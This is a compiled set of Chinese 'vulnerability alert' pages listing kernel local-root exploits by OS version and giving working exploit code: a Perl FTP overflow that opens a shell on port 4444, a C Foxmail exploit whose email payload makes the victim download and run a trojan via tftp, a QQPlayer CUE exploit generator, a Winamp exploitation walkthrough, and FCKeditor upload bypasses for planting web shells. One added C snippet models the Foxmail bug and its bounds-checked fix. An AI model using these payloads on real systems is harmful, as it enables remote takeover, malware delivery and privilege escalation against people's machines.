[Introduction] Below is the editor's compilation "Summary of overflow vulnerabilities by Linux version (overflow code), vulnerability alert" (18 pieces in all), provided for reference only; we hope you like it and will share it.

Part 1: Summary of overflow vulnerabilities by Linux version (overflow code), vulnerability alert
2.4.17
newlocal
kmod
2.4.18
brk
brk2
newlocal
kmod
km.2
2.4.19
brk
brk2
newlocal
kmod
km.2
2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2
2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod
2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod
2.4.22-10
loginx
./loginx
2.4.23
mremap_pte
2.4.24
mremap_pte
Uselib24
2.4.25-1
uselib24
2.4.27
Uselib24
2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit
2.6.2
mremap_pte
krad
h00lyshit
2.6.5 to 2.6.10
krad
krad2
h00lyshit
2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit
2.6.9-34
r00t
h00lyshit
2.6.13-17
prctl
h00lyshit
-------------------
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
-----------------------------------------------------
Linux
Common
Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.2.x (on exported files, should be vuln) (milw0rm.com/exploits/718)
Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.4.x -> pwned.c - Linux 2.4 and 2.6 sys_uselib local root exploit (milw0rm.com/exploits/895)
Linux 2.4.x ->Linux kernel 2.4 uselib privilege elevation exploit (milw0rm.com/exploits/778)
Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (milw0rm.com/exploits/12)
Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (milw0rm.com/exploits/131)
Linux 2.4.22 ->Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC) (milw0rm.com/exploits/129)
Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (milw0rm.com/exploits/718)
Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (milw0rm.com/exploits/1397)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) (milw0rm.com/exploits/2031)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (milw0rm.com/exploits/2011)
Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (milw0rm.com/exploits/2013)
Linux 2.6.x < 2.6.7-rc3 (default configuration) (milw0rm.com/exploits/718)
Linux 2.6.x -> pwned.c - Linux 2.4 and 2.6 sys_uselib local root exploit (milw0rm.com/exploits/895)
Debian
Debian 2.2 ->/usr/bin/pileup Local Root Exploit (milw0rm.com/exploits/1170)
Ubuntu
Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (milw0rm.com/exploits/1579)
Slackware
Slackware 7.1 ->/usr/bin/Mail Exploit (milw0rm.com/exploits/285)
Mandrake
Mandrake 8.2 -> /usr/mail local exploit (milw0rm.com/exploits/40)
Mandrake <= 10.2 -> cdrdao Local Root Exploit (milw0rm.com/exploits/997)
Suse
SuSE Linux 9.1 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 9.2 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 9.3 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 10.0 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 8 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 9 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
BSD
Freebsd
Freebsd 3.5.1 ->Ports package local root (milw0rm.com/exploits/286)
Freebsd 4.2 ->Ports package local root (milw0rm.com/exploits/286)
FreeBSD 4.x <= 5.4 -> master.passwd Disclosure Exploit (milw0rm.com/exploits/1311)
Openbsd
Openbsd 2.x - 3.3 ->exec_ibcs2_coff_prep_zmagic() Kernel Exploit (milw0rm.com/exploits/125)
OpenBSD 3.x-4.0 ->vga_ioctl() root exploit (milw0rm.com/exploits/3094)
Sun-Microsystems
Solaris
Solaris 2.4 ->lion24.c (milw0rm.com/exploits/328)
Solaris 2.6 with 107733-10 and without 107733-11 (milw0rm.com/exploits/1182)
Solaris 5.5.1 ->X11R6.3 xterm (milw0rm.com/exploits/338)
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (milw0rm.com/exploits/1182)
Solaris 7 without patch 107178-03 (milw0rm.com/exploits/714)
Solaris 7 without patch 107178-03 (milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (milw0rm.com/exploits/714)
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (milw0rm.com/exploits/1182)
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (milw0rm.com/exploits/715)
Solaris 9 without patch 116308-01 (milw0rm.com/exploits/714)
Solaris 9 without patch 116308-01 (milw0rm.com/exploits/713)
Solaris 9 without 113476-11 (milw0rm.com/exploits/715)
Solaris 9 without 112963-09 (milw0rm.com/exploits/1182)
Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (milw0rm.com/exploits/2543)
Solaris 10 (libnspr) constructor Local Root Exploit (milw0rm.com/exploits/2641)
SunOS
SunOS 5.10 Generic i86pc i386 i86pc (milw0rm.com/exploits/1073)
SunOS 5.9 Generic_112233-12 sun4u (milw0rm.com/exploits/1073)
Part 3: FtpdInnes remote overflow exploit, vulnerability alert
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
    print "Usage: ./Ftpd-innes.pl target host port\n\n";
    exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
    or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x20;
my $asm="\x7c\xc5\x66\x07\x12\x02\x50\xc3";
my $nop1="\x90"x60;
my $nop2="\x90"x10;
my $eip="\x42\xfd\x60\x40";
#my $eip="A"x5;
my $shellcode =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xed".
"\x7d\x09\xbf\x83\xeb\xfc\xe2\xf4\x11\x17\xe2\xf2\x05\x84\xf6\x40".
"\x12\x1d\x82\xd3\xc9\x59\x82\xfa\xd1\xf6\x75\xba\x95\x7c\xe6\x34".
"\xa2\x65\x82\xe0\xcd\x7c\xe2\xf6\x66\x49\x82\xbe\x03\x4c\xc9\x26".
"\x41\xf9\xc9\xcb\xea\xbc\xc3\xb2\xec\xbf\xe2\x4b\xd6\x29\x2d\x97".
"\x98\x98\x82\xe0\xc9\x7c\xe2\xd9\x66\x71\x42\x34\xb2\x61\x08\x54".
"\xee\x51\x82\x36\x81\x59\x15\xde\x2e\x4c\xd2\xdb\x66\x3e\x39\x34".
"\xad\x71\x82\xcf\xf1\xd0\x82\xff\xe5\x23\x61\x31\xa3\x73\xe5\xef".
"\x12\xab\x6f\xec\x8b\x15\x3a\x8d\x85\x0a\x7a\x8d\xb2\x29\xf6\x6f".
"\x85\xb6\xe4\x43\xd6\x2d\xf6\x69\xb2\xf4\xec\xd9\x6c\x90\x01\xbd".
"\xb8\x17\x0b\x40\x3d\x15\xd0\xb6\x18\xd0\x5e\x40\x3b\x2e\x5a\xec".
"\xbe\x2e\x4a\xec\xae\x2e\xf6\x6f\x8b\x15\x18\xe3\x8b\x2e\x80\x5e".
"\x78\x15\xad\xa5\x9d\xba\x5e\x40\x3b\x17\x19\xee\xb8\x82\xd9\xd7".
"\x49\xd0\x27\x56\xba\x82\xdf\xec\xb8\x82\xd9\xd7\x08\x34\x8f\xf6".
"\xba\x82\xdf\xef\xb9\x29\x5c\x40\x3d\xee\x61\x58\x94\xbb\x70\xe8".
"\x12\xab\x5c\x40\x3d\x1b\x63\xdb\x8b\x15\x6a\xd2\x64\x98\x63\xef".
"\xb4\x54\xc5\x36\x0a\x17\x4d\x36\x0f\x4c\xc9\x4c\x47\x83\x4b\x92".
"\x13\x3f\x25\x2c\x60\x07\x31\x14\x46\xd6\x61\xcd\x13\xce\x1f\x40".
"\x98\x39\xf6\x69\xb6\x2a\x5b\xee\xbc\x2c\x63\xbe\xbc\x2c\x5c\xee".
"\x12\xad\x61\x12\x34\x78\xc7\xec\x12\xab\x63\x40\x12\x4a\xf6\x6f".
"\x66\x2a\xf5\x3c\x29\x19\xf6\x69\xbf\x82\xd9\xd7\x1d\xf7\x0d\xe0".
"\xbe\x82\xdf\x40\x3d\x7d\x09\xbf";
$exploit = "\x00\x01" . $nop0 .$asm.$nop1. $shellcode. $nop2 .$eip. "\x00\x7e\x56\x70\x60\x70\x45\x69\x69\x00";
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
Part 4: Foxmail 5 remote buffer overflow vulnerability, vulnerability alert
Note: this article was presented in February by an xfocus member during an internal technical exchange. Before that, engineers at 启明星辰 (Venustech) had already discovered this vulnerability but had not published details; after hearing that it existed, the xfocus member analysed Foxmail and wrote the exploit code.
Test environment: Win2k SP4 + Foxmail 5.0.300
When testing Foxmail 4.x earlier I had found an overflow, but never had time to study it and set it aside. Later I heard that Foxmail 5 also had an overflow, but never saw it published, so in my spare time I simply looked into it myself. Testing showed that the earlier overflow had been patched, but a new vulnerability had appeared.
The problem is in the UrlToLocal function of PunyLib.dll, which appears to be a library for handling spam. When a mail is classified as spam, UrlToLocal is called to process the "From: " field of the message body; a stack overflow occurs during that processing, which can lead to arbitrary code execution.
The processing goes as follows:
.text:10002040 public UrlToLocal
.text:10002040 UrlToLocal proc near
.text:10002040
.text:10002040 arg_0 = dword ptr 4
.text:10002040 arg_4 = dword ptr 8
.text:10002040
.text:10002040 mov eax, dword_1000804C
.text:10002045 mov ecx, dword_10008030
.text:1000204B mov edx, [esp+arg_4]
.text:1000204F push offset aHttp ; ""
.text:10002054 push eax
.text:10002055 mov eax, [esp+8+arg_0]
.text:10002059 push offset unk_10008034
.text:1000205E push ecx
.text:1000205F push edx
.text:10002060 push eax
.text:10002061 call sub_10002070 ; calls 10002070; the arguments hold the contents following the "From: " field of the message body
.text:10002070 sub_10002070 proc near ; CODE XREF: UrlToLocal+21p
.text:10002070 ; EmailAdrToLocal+107p
.text:10002070
.text:10002070 var_600 = dword ptr -600h
.text:10002070 var_500 = dword ptr -500h
.text:10002070 var_400 = dword ptr -400h
.text:10002070 var_300 = dword ptr -300h
.text:10002070 var_200 = dword ptr -200h
.text:10002070 var_100 = dword ptr -100h
.text:10002070 arg_0 = dword ptr 4
.text:10002070 arg_4 = dword ptr 8
.text:10002070 arg_8 = dword ptr 0Ch
.text:10002070 arg_C = dword ptr 10h
.text:10002070 arg_10 = dword ptr 14h
.text:10002070 arg_14 = dword ptr 18h
.text:10002070
.text:10002070 mov edx, [esp+arg_0]
.text:10002074 sub esp, 600h
......
.text:100020DF push eax
.text:100020E0 push ecx
.text:100020E1 push ebx
.text:100020E2 call sub_10001A30 ; calls 10001A30, the function in which the overflow happens
.text:10001A30 sub_10001A30 proc near ; CODE XREF: sub_10002070+72p
.text:10001A30 ; sub_10002290+95p
.text:10001A30
.text:10001A30 var_104 = dword ptr -104h
.text:10001A30 var_100 = dword ptr -100h
.text:10001A30 arg_0 = dword ptr 4
.text:10001A30 arg_4 = dword ptr 8
.text:10001A30 arg_8 = dword ptr 0Ch
.text:10001A30 arg_C = dword ptr 10h
.text:10001A30 arg_10 = dword ptr 14h
.text:10001A30 arg_14 = dword ptr 18h
.text:10001A30
.text:10001A30 sub esp, 104h ; allocates a 0x104-byte stack buffer, but the copied "From: " field can be up to 0x200 bytes
.text:10001A36 push ebx
.text:10001A37 mov ebx, [esp+108h+arg_0]
.text:10001A3E push ebp
.text:10001A3F mov ebp, [esp+10Ch+arg_10]
.text:10001A46 push esi
.text:10001A47 xor esi, esi
......
.text:10001AA9 sub edi, ecx
.text:10001AAB mov eax, ecx
.text:10001AAD mov esi, edi
.text:10001AAF mov edi, edx
.text:10001AB1 shr ecx, 2
.text:10001AB4 rep movsd ; the overflow happens in this memory copy: the data is copied into the 0x104-byte buffer using the length of the "From: " field
.text:10001AB6 mov ecx, eax
.text:10001AB8 and ecx, 3
.text:10001ABB rep movsb
......
.text:10001AE7 mov edi, [esp+114h+arg_C]
.text:10001AEE shr ecx, 2
.text:10001AF1 rep movsd ; several places here operate on local variables; since those have been overwritten, they must be overwritten with a writable address. I used 0x7ffdf220, which should be in the PEB region, so the shellcode later has to restore that region's contents to 0
.text:10001AF3 mov ecx, eax
.text:10001AF5 and ecx, 3
.text:10001AF8 rep movsb
......
.text:10001BD7 pop edi
.text:10001BD8 pop esi
.text:10001BD9 pop ebp
.text:10001BDA pop ebx
.text:10001BDB add esp, 104h
.text:10001BE1 retn ; on return, control goes to our JMP ESP address
This overflow cannot overwrite the SEH, and the string may not contain the awkward characters "@", "(", ",", "\r" and "\n". The shellcode used is the one ey4s wrote that downloads and runs an exe via URLMON.
Some mail servers truncate the shellcode, so I changed it again to use a shorter shellcode that runs tftp directly to download and run the program. Testing showed the success rate was somewhat higher than before, but it is easily blocked by firewalls.
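The copy described in the listing above, where a field of up to 0x200 bytes is written into a 0x104-byte stack buffer with no length comparison, reduces to the pattern below. This is an added example written for this page, not code from the article or from Foxmail: it models the frame of sub_10001A30 as a C struct with the buffer directly below the saved return address (the sentinel value 0x10002140 stands in for the real return address and is an assumption), runs the unchecked copy the listing performs beside the bounded copy that would have prevented the bug, and reports the value each leaves in the return-address slot.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Sizes taken from the listing above. */
#define FROM_BUF_SIZE  0x104         /* "sub esp, 104h": the local buffer of sub_10001A30 */
#define FROM_FIELD_MAX 0x200         /* longest "From: " field the caller passes down */
#define RET_SENTINEL   0x10002140u   /* constructed stand-in for the saved return address */

/* Simplified model of the x86-32 frame: the local buffer sits directly below the
 * saved return address, so bytes copied past buf land on ret. The registers
 * pushed after "sub esp" lie below buf and are not reached by the overflow, so
 * they are left out; caller_frame only keeps the whole model inside one object. */
struct frame {
    unsigned char buf[FROM_BUF_SIZE];
    uint32_t      ret;
    unsigned char caller_frame[0x100];
};

/* The copy as the listing performs it: ecx holds the field length and nothing
 * compares it against the buffer. Written as a byte loop (rep movsb) so that the
 * demonstration stays inside the struct; FROM_FIELD_MAX is below sizeof(struct frame). */
static void copy_from_field_unchecked(struct frame *f, const unsigned char *src, size_t len)
{
    unsigned char *dst = (unsigned char *)f;      /* buf is at offset 0 of the frame */
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i];
}

/* The fix: refuse a field that does not fit before touching the buffer. */
static int copy_from_field_checked(struct frame *f, const unsigned char *src, size_t len)
{
    if (len >= sizeof f->buf)                      /* keep room for a terminator */
        return -1;
    memcpy(f->buf, src, len);
    f->buf[len] = '\0';
    return 0;
}

/* Copies a constructed field of `len` 'A' bytes into a fresh frame with one of the
 * two routines and returns the value left in the return-address slot. */
uint32_t ret_after_copy(size_t len, int use_checked_copy)
{
    unsigned char field[FROM_FIELD_MAX];
    struct frame f;

    if (len > FROM_FIELD_MAX)
        len = FROM_FIELD_MAX;
    memset(field, 'A', sizeof field);
    memset(&f, 0, sizeof f);
    f.ret = RET_SENTINEL;

    if (use_checked_copy)
        copy_from_field_checked(&f, field, len);   /* a rejected field leaves ret alone */
    else
        copy_from_field_unchecked(&f, field, len);
    return f.ret;
}

int main(void)
{
    printf("unchecked copy, 0x200-byte field: ret = 0x%08x\n", (unsigned)ret_after_copy(0x200, 0));
    printf("checked copy,   0x200-byte field: ret = 0x%08x\n", (unsigned)ret_after_copy(0x200, 1));
    printf("unchecked copy, 0x080-byte field: ret = 0x%08x\n", (unsigned)ret_after_copy(0x80, 0));
    return 0;
}
```

With a 0x200-byte field the unchecked copy leaves 0x41414141 in the return-address slot, which is the state the comment on the final `retn` refers to; the checked copy rejects the field and the slot keeps the sentinel. The fix is the length comparison, not a bigger buffer: a 0x200-byte buffer would only move the boundary, since the field length is still chosen by the sender.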
/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
 *
 * (C) COPYRIGHT XFOCUS Security Team,
 * All Rights Reserved
 *
 * This is unpublished proprietary source code of XFOCUS Security Team.
 * It should not be distributed in any form without express permission
 * from XFOCUS Security Team.
 *
 * -----------------------------------------------------------------------
 * Author : xfocus
 * : www.xfocus.org
 * Maintain : XFOCUS Security Team
 * Version : 0.2
 *
 * Test : Windows server GB/XP professional
 * + Foxmail 5.0.300.0
 * Notes : unpublished vul.
 * Greets : ey4s, and all member of XFOCUS Security Team.
 * Compile : cl fmx.c
 * Usage : fmx <mail_addr> <tftp_server> <smtp_server>
 * mail_addr: email address we want to hack
 * tftp_server: run a tftp server and have a a.exe trojan
 * smtp_server: SMTP server don't need login, we send the email thru it
 *
 * Date : 2004-02-27
 * Revised : 2004-03-05
 *
 * Revise History:
 * -03-05 call WinExec addr of Foxmail.exe module to run tftp for down&execute
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
" name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";
//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

#define SMTPPORT 25
int Make_Connection(char *address,int port,int timeout);
int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;
    if(argc!=4)
    {
        printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>\n", argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, winexec); //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
    WSACleanup();
    return 0;
}

// Establish a TCP connection
// Input:
//   char * address   IP address
//   int port         port
//   int timeout      timeout in seconds
// Output:
// Return:
//   success  >0
//   error    <=0
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;
    s = socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)   // SOCKET is unsigned; a "< 0" test can never fire
        return -1;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);   // non-blocking, so the connect can be timed out via select()
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);   // bf is 0 here: back to blocking mode
    return s;
}

//send magic mail
int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET csock;
    int conn, ret;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    conn = Make_Connection(smtpserver, SMTPPORT, 10);
    if(conn<0)
    {
        printf("connect err.\n");
        exit(1);
    }
    csock = (SOCKET)conn;
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    Sleep(1000);
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
    sprintf(tmp1, tmp, tftp);
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    *(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb; //jmp back
    *(int *)(buf+0x108)=0x7ffdf220; //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220; //writeable addr
    memcpy(buf, "girl\x0d", 5);
    sprintf(sbuf, (char *)packet, buf);
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, sizeof(buf)-1, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf("%s", buf);
    printf("exploit mail sent.\n");
    closesocket(csock);
    return 0;
}
xfocus (安全焦点)
Part 5: QQPlayer CUE file buffer overflow vulnerability, vulnerability alert
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head = '''FILE "'''
junk = "A" * 780
nseh = "\x42\x61\x21\x61"
seh = "\xa9\x9e\x41\x00"
adjust = "\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode = ("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
             "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
             "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
             "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_ = "R" * 8000
foot = '''.avi" VIDEO''' + "\x0a" + '''TRACK 02 MODE1/8888''' + "\x0a" + "INDEX 08 08:08:08"
payload = head + junk + nseh + seh + adjust + shellcode + junk_ + foot
fobj = open("poc.cue", "w")
fobj.write(payload)
fobj.close()
Part 6: Winamp stack overflow analysis and exploitation, vulnerability alert
Winamp is a fairly old media player. Here we analyse one Winamp PoC and build an exploit from it; the main program is in the attachment winamp.exe and the PoC in the attachment poc.m3u.
1. PoC analysis
First look at the PoC. Apart from the first ten or so bytes, which the m3u format requires, everything else is 'A'.
Run winamp.exe and drag poc.m3u into the main window: the program crashes immediately. To see the state at the crash, set WinDbg as the just-in-time debugger with this command in cmd:
windbg -I
Run the PoC again; WinDbg pops up automatically and shows the crash state:
An exception occurs, mainly because esi+4 is not writable. Set esi=00445000 with the command:
r @esi=00445000
Continue running; it stops at
eax is 41414141 and [eax+0c] is not readable either. Analysis shows that bit 5 of [eax+0c] must be 1 for the program to reach the strcpy, so set eax=12c238.
Continue running; the program runs to 41414141, so we have full control of execution.
2. Locating the exception
Locate it by constructing a special PoC:
Result: esi=eax=306a4139, and the final eip=6141326a.
Searching in the PoC file
shows that to bypass the exception, the 4-byte data at 0x11e must satisfy:
[data+4] is readable
and bit 5 of byte ptr [data+c] is 1
In the end a data value that satisfies the conditions was chosen: 719f7bf0
The overwrite point is at 0x126, which holds the address of a jmp esp (7ffa4512 is used here, a fairly universal jmp esp address).
3. Building the exploit
The complete exploit construction is in the attachment. In short: the 4 bytes that bypass the exception go at 0x11e, the jmp esp address at 0x126, and the shellcode starts at 0x12a.
Test (environment: XP SP3):
Result: the calculator pops up successfully.
Attachment download: pan.baidu.com/s/1sjoCWMx
Part 7: Bypasses for various FCKeditor versions, vulnerability alert
Copyright unknown -
FCKeditor v2.43: FCKeditor/editor/filemanager/browser/default/connectors/php/config.php
FCKeditor V2.6.6: fckeditor/editor/filemanager/connectors/asp/config.php
Check the editor version:
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2
Under Apache + Linux, append a "." to the uploaded file name to bypass. Tested and working.
—————————————————————————————————————————————————————————————
3. Version <= 2.4.2 for PHP: the PHP upload handler does not restrict the uploaded file type for the Media type, so a user can upload arbitrary files. Save the following as an HTML file and change the action address.
<form action="www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post" enctype="multipart/form-data">Upload a new file:<input type="file" name="NewFile"><input type="submit" value="Upload"></form>
—————————————————————————————————————————————————————————————
Present in higher versions, absent in lower versions
4. Bypassing FCKeditor's replacement of "." with "_" in uploaded file names
Often an uploaded file such as shell.php.rar or shell.php;.jpg becomes shell_php;.jpg; this is a change in newer FCK versions.
4.1: Submit shell.php followed by a space to bypass.
